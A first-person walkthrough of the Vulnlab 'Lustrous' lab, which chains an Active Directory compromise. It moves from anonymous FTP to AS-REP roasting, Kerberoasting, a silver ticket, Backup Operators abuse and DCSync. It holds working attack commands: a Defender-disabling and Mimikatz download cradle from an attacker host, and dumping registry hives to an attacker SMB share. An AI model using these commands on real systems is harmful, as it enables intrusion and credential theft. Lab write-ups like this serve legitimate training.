Vulnlab — Lustrous Walkthrough

Lustrous is a chain machine from the Vulnlab. Unlike standalone machines, it consists of two machines which are linked. This post will walk you through details of how I solved this machine.

Nmap Scan — 10.10.154.101

Nmap scan report for 10.10.154.101
Host is up, received user-set (0.17s latency).
Scanned at 2023-08-20 21:49:19 +08 for 136s

PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21  11:50AM       <DIR>          transfer
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-20 13:49:26Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Issuer: commonName=LusDC.lustrous.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-26T09:46:02
| Not valid after:  2022-12-26T00:00:00
| MD5:   ab7fdbe0a3742b3b232981eefa008bb6
| SHA-1: 63173ae39a2de8a4fe2769e001b61dbc38685a1a
| -----BEGIN CERTIFICATE-----
| MIIDBDCCAeygAwIBAgIQY3t36K6d1rRLFAjf/Ia0cTANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFMdXNEQy5sdXN0cm91cy52bDAeFw0yMTEyMjYwOTQ2MDJaFw0y
| MjEyMjYwMDAwMDBaMBwxGjAYBgNVBAMTEUx1c0RDLmx1c3Ryb3VzLnZsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAusluWMaat8zB+osH/q7NMdnERfdb
| emiwHTogJQM32bIoEeyeMNjHK2eOsgITF8ttVUFiC5D46QZZw/cW75KB7pv9CiOH
| HLiehQOBAjbQDUKPFlRT2OD8I+IywxfktYRgse63ABmpKIrLP3+hZARob4KksmDt
| 6xd8yXE2mNX8Y2c5BOcwiUiTJNoAmZaWdqZhEa7vQwlDfQ71qfpgB5hLbzd+ohWX
| D7czGTqzq8T9v8eq7ojciYG7tXX1ksSq5OKzBvgz1MtQa2UUbKRdylOwRDY8WgVX
| comKDZ3xIdl2egDKcYipwfUm1W2kH8RvOcr4wiIYD4YZyF1Yv0wCnwKO7QIDAQAB
| o0IwQDALBgNVHQ8EBAMCBLAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwHAYDVR0RBBUw
| E4IRTHVzREMubHVzdHJvdXMudmwwDQYJKoZIhvcNAQELBQADggEBAGjygksFNQhF
| D4Fd7IpPESYzsaGSHE53SYfd5ZBZmOqouizBnCDTEhfYsIuM1iB9759fFg7SgZhe
| lOSN/9DOrTsmC+UXkrFX+iUuYhrOKF+4Ns8gEqOvojhsl8b1+YNszw1X73zmK1Ld
| cFBNpaF18J5LaobV65AWw024EIb2vxRNkur8yRAsGhVY1TW1L24lHBjaQKzNQWM7
| OM5m1Ep4tkEzD0Jb6p2HYeWRCjgAOcQEeULvPR1tPwTTzFh0U/nNwfWhbciiZGmO
| jyGZiTBfbzx6MrqTCe9aDtR77t3a1cUgX4+KD9YJ21XfdXHtH3nvmlwbBnRlAS24
| 89tLIEZf25I=
|_-----END CERTIFICATE-----
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: TLS randomness does not represent time
|_http-title: Not Found
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Issuer: commonName=LusDC.lustrous.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-26T18:26:35
| Not valid after:  2023-11-25T18:26:35
| MD5:   cf7196386bb9baba7e6d4f1ead74d04a
| SHA-1: 180e49abdf3d665aeb39fc00fad307b1af16b7e8
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAc6gAwIBAgIQTBj8N0DSUYFIHv8n7Is+7DANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFMdXNEQy5sdXN0cm91cy52bDAeFw0yMzA1MjYxODI2MzVaFw0y
| MzExMjUxODI2MzVaMBwxGjAYBgNVBAMTEUx1c0RDLmx1c3Ryb3VzLnZsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAp3q4gCC8pvTvrkVkqMZEAJCUlVyZ
| n+BHsu6rkIrd7IK5J7h6T7pXUbTVr/3PGGZhOGBYnbqTKxO2zk9wNHV3hanXh3oQ
| ff5o98s9mnGyilDh0d0eKFXGuXUiex0lc429It048yPh1qdirZbntOZDSI3lWqSe
| PsNyk1UUyrrKc568t2qLjZbchUP1SNXgpvqQghfdWE4cVo4LNXMwYOqB1gMcKA7l
| qRBlV6t6RURVKyuylM1ZbtzGZn9+6hLKcS3CVniFuY4s/xTCBgn05vc2exRbds7W
| pabinQbUI41l5KqxV6fl9BithytzziiesjDuV5m4bC7GNOuCV9qStvSWBQIDAQAB
| oyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcN
| AQELBQADggEBAFMMdR33P8W60YqdTVtvnwv7mU0x5zyH1nXTcS31Eu0qDs8j39Xt
| h8/uqBADACZr0XnkURJ74tdcCNPwmRwqV/gzYKRY/6ebNUxBKgaHZyzC6S2u7pRq
| GkPPyfK+Ihgn9huDfp8PlqwrNBvs3huQuffaDXZZpp/MLzOh1zy3sfG8eDs2O9vg
| LsyFCCXBw3iI9Z4+HLnBHfrfb/chUE9w4oMVdLApg3CicOPoCT9mLHqJjslidMT1
| A9i1IMaBBQMMw0eU1bda8yIYhcyASPhWhcKMb1AhZ2hMaKHFktJ/VoDB7myVCmEw
| ITjnwKPnJsLvfI8tcwgrFskWq0uJJDQ7+LI=
|_-----END CERTIFICATE-----
|_ssl-date: 2023-08-20T13:50:59+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSDC
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusDC.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-20T13:50:21+00:00
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
51406/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
51407/tcp open  msrpc         syn-ack Microsoft Windows RPC
51446/tcp open  msrpc         syn-ack Microsoft Windows RPC
56604/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: LUSDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: -1s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 30410/tcp): CLEAN (Timeout)
|   Check 2 (port 47699/tcp): CLEAN (Timeout)
|   Check 3 (port 48760/udp): CLEAN (Timeout)
|   Check 4 (port 43653/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-08-20T13:50:22
|_  start_date: N/A

Nmap Scan — 10.10.154.102

Nmap scan report for 10.10.154.102
Host is up, received user-set (0.16s latency).
Scanned at 2023-08-20 21:43:57 +08 for 98s

PORT      STATE SERVICE       REASON  VERSION
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSMS
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusMS.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-20T13:44:55+00:00
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
| Issuer: commonName=LusMS.lustrous.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-26T18:26:42
| Not valid after:  2023-11-25T18:26:42
| MD5:   d134646a2be346f8ecaf3408cebf7ba4
| SHA-1: f96694f44b0dccf08069b1f60a30fb2ff1d310c5
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAc6gAwIBAgIQSBXPSeXKb6hIXUpXc46xpzANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFMdXNNUy5sdXN0cm91cy52bDAeFw0yMzA1MjYxODI2NDJaFw0y
| MzExMjUxODI2NDJaMBwxGjAYBgNVBAMTEUx1c01TLmx1c3Ryb3VzLnZsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzCmFWk+GivSNndH/8BgN+8zCvs2v
| fnNHG1wzOm0/aUresYzt6GagEemaXxz9HrMNrJ5ykT8yksUUpx8LwJLeyCYpY6ra
| g6XLwU2om2P7L5453hzHewtuzIIl26ih9unvcwdcLBUjncRr8FiFG/6BBcMA+BSr
| wVRAFflZ5r0fSIfDsGIhywNPpFpecoJLIntTqleHFATYkXkXDkgN2YnhSHDWE08s
| SOLAVskpIqg1gpjM886UlFRVVpo3GHaEXmeLMOdIaiAI4E9pu5FmpL02SJ1Qu1eR
| FwULKmYkn/qsfuhdTdeSF3oKGnqUJ159PcAgpLNnz7Gh8XW+caHqv15X8QIDAQAB
| oyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcN
| AQELBQADggEBACiUDJWI7WWas/PM1iahHGtI0aiEesjcFqJYwboEUmPOAk52/4JG
| Int3iyPOuvJGcsOOs5EN8x8GF61QGdfDOK8WKRAyxIZqSjYoTPKu+SwSOScKn1K1
| I9AGRgEXTEUHDr3g941kuzwpByrOI/aEQHKfq6I09CWqM903gm2pGq8CRC8N78i2
| kBemTwB1PsnRbHnBg8fzRJGy4X/iLP3DC+xAujk8oBLJdTLyPInu4zR8hFx55P/K
| IICOp/G3y8EPz5kzBdgQdOt7YMWYRnMPPSBbBMRmqzUa1Ujd9KvCy9fVNGNVBTJD
| 8K7z4CG6z47Ohyue1cy7bu/3UYjG4BkExDY=
|_-----END CERTIFICATE-----
|_ssl-date: 2023-08-20T13:45:34+00:00; -1s from scanner time.
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 17438/tcp): CLEAN (Timeout)
|   Check 2 (port 16917/tcp): CLEAN (Timeout)
|   Check 3 (port 22674/udp): CLEAN (Timeout)
|   Check 4 (port 33723/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2023-08-20T13:44:58
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

As hostnames were revealed in the ssl cert, edited the hosts file to map the IP addresses and hostnames accordingly.

10.10.154.101   lusdc.lustrous.vl lustrous.vl
10.10.154.102   lusms.lustrous.vl

From the nmap scan of 10.10.154.101, there was an FTP service running and it allowed anonymous login. So we could login to the FTP as anonymous.

ftp 10.10.154.101
Connected to 10.10.154.101.
220 Microsoft FTP Service
Name (10.10.154.101:user): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50100|)
150 Opening ASCII mode data connection.
12-26-21  11:50AM       <DIR>          transfer
226 Transfer complete.
ftp> ls transfer
229 Entering Extended Passive Mode (|||50101|)
125 Data connection already open; Transfer starting.
12-26-21  11:51AM       <DIR>          ben.cox
12-26-21  11:49AM       <DIR>          rachel.parker
12-26-21  11:49AM       <DIR>          tony.ward
12-26-21  11:50AM       <DIR>          wayne.taylor
226 Transfer complete.
ftp>

Discovered a bunch of possible usernames in the transfer directory. No other interesting data were found within the directories though. However, we got the usernames which would be useful to do further enumeration.

AS-REP Roasting

Since we got the usernames, we could perform the AS-REP Roasting which allows us to steal the password hashes of user accounts that have Kerberos preauthentication disabled. GetNPUsers script from the impacket was used to do it, and found that ben.cox had Kerberos preauthentication disabled.

impacket-GetNPUsers lustrous.vl/ -dc-ip lusdc.lustrous.vl -usersfile users.txt

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

$krb5asrep$23$ben.cox@LUSTROUS.VL:a875ff60fefdb0262fbb2ac20d36bf43$786eb1bc911135157188e6675e0016f52e75b01a0a6ff220960fb27e6297035ae6b83b973e025cb1d6a5f8175163205651b79976fea7f6e3baec2e5039fe6bfcce4ac21f1755f7fda5d8378d88ec86ef96dead8d12ad360f31eba954b583139f64d79c9a384adf45030a14764fb6969403310dd28812984a8859a45d9745dcc7d877f63d2d9e9e2af6da2eb44b7ba7d98a4942a53998c110e1883f9c6f243faa82f34a5f38a26008a87505213f218f5c49c9ce6a628326b6f303b0c6566f204ca6b76236773344f9b83881debebe965a20e498c6388c28ed1a0b0bcf2ccbfca63fe1ecc06fb9225d0bff
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set

From the hash, it was possible to crack the plaintext password of the user.

john --wordlist=/usr/share/wordlists/rockyou.txt ben.cox.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trinity1         ($krb5asrep$23$ben.cox@LUSTROUS.VL)     
1g 0:00:00:00 DONE (2023-08-23 23:03) 11.11g/s 682666p/s 682666c/s 682666C/s XIOMARA..sinead1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

After obtaining the password, we can attempt to access the hosts through protocols such as SMB and WinRM. And it was found that ben.cox user could login to the lusms host via the WinRM.

On the Desktop, we found an xml representation of a PSCredential Object file named admin.xml.

By following this blog post, we can extract the cleartext data from the file.

We can then login to the host using the administrator account, and red the flag.

Lusms host was now completely owned as we gained administrator access to the host. Going back to the lusc host, I couldn’t find many useful things apart from some data such as usernames (including ben.cox credentials). Doing post-exploitation activities such as harvesting credentials on the lusms host didn’t find anything either. So I decided to rdp into the host using the adminstrator credentials.

xfreerdp /u:administrator /p:'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF' /w:1566 /h:968 /v:lusms.lustrous.vl:3389

From the nmap scan output of lusdc host, we found that there was a web server running on port 80, and 443. Upon browsing the port 80, http://lusdc.lustrous.vl on browser, we were greeted with a login prompt, meaning that the web app was using the Kerberos authentication.

As we already got some credentials, we could login to the application. Used ben.cox credentials to login, and browsing around the application didn’t find anything useful.

So I decide to do user enumeration within the Active Directory, and launched a cmd.exe instance in the context of ben.cox using runas command.

Among many AD users, tony.ward seemed to be a promising one as he was a member of backup admins group. Hence, if we are somehow able to gain access to the tony.ward account, we could escalate our privileges by abusing the backup admins privileges.

In the AD users, I noticed that there were distinct users, svc_db, and svc_web. Those users were seemed to be using as service accounts. We can use the GetUserSPNs script from impacket to check it.

At this point, we can now confirm that svc_web was for the HTTP service while svc_db was for the database service.

Kerberoasting

In Active Directory, one of the attacks that involves service account is silver ticket attack. So if we manage to get the NTLM hash of the service account, svc_web, we can generate a silver ticket and impersonate any user against the web application.

We can use the previous GetUserSPNs script again to perform the Kerberoasting attack.

We were able to crack TGS ticket, and got the password of svc_web service account.

Since we now have the password, we can convert it into the NTLM hash using python.

import hashlib

password = "iydgTvmujl6f"
password_bytes = password.encode("utf-16le")
md4_hash = hashlib.new("md4", password_bytes).digest()
ntlm_hash = md4_hash.hex()
print(ntlm_hash)

Silver Ticket Attack

Now we got the NTLM hash of the svc_web service account. In order to perform the silver ticket attack, we still need to know domain, and target user SIDs. The following wmic command can be use to extract the necessary information.

After that Mimikatz can be used to perform the silver ticket attack. So we loaded the Invoke-Mimikatz.ps1 script into memory using the download cradle. Before loading the Mimikatz, make sure that Windows Defender is disabled.

Set-MpPreference -DisableRealtimeMonitoring $true
iex (iwr 10.8.0.211/Invoke-Mimikatz.ps1 -UseBasicParsing)

After that we crafted the silver ticket and injected it into memory.

Invoke-Mimikatz -Command '"kerberos::golden /domain:lustrous.vl /sid:S-1-5-21-2355092754-1584501958-1513963426 /target:lusdc.lustrous.vl /service:HTTP /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /user:tony.ward /id:1114 /target:lusdc.lustrous.vl /ptt"'

After that we can use the PowerShell Invoke-WebRequest cmdlet with the UseDefaultCredentials flag to access the web application in the context of tony.ward user.

(iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials).Content

We actually found the password of tony.ward.

Abusing the Backup Admins Privileges

Since we got the tony.ward password, we can now use it to extract SAM database from the lusdc host. We can leverage the BackupOperatorToDA tool to do so. The tool attempts to dump the SAM file from the lusdc and export it on the remote share. So we needed to create a smb share using the smbserver script from impacket first.

impacket-smbserver -smb2support smb $(pwd)

Then uploaded the tool to the rdp session, and executed it with the necessary parameters.

.\BackupOperatorToDA.exe -t \\lusdc.lustrous.vl -u tony.ward -p U_cPVQqEI50i1X -d lustrous.vl -o \\10.8.0.211\smb\

Once executed, we saw incoming smb connection on our impacket smbserver.

After some minutes, the sam file along with security, and system files were dumped on to the smb server.

ls -la
total 16644
drwxr-xr-x 2 user user     4096 Aug 24 01:49 .
drwxr-xr-x 4 user user     4096 Aug 23 23:07 ..
-rwxr-xr-x 1 user user    28672 Aug 23 22:04 SAM
-rwxr-xr-x 1 user user    45056 Aug 23 22:36 SECURITY
-rwxr-xr-x 1 user user 16961536 Aug 23 22:26 SYSTEM

Secretsdump script from the impacket can be used to extract hashes from the files.

Although we got the local administrator hash, using that hash to gain access to the lusdc host got access denied. It was likely due to that domain administrator password is not the same. However, we can do DCSync attack using the machine account hash.

Therefore, impacket-secretsdump was once again used to perform the DCSync attack on the lusdc host.

This time we can use the domain administrator hash to gain access to the lusdc host.

Finally read the flag!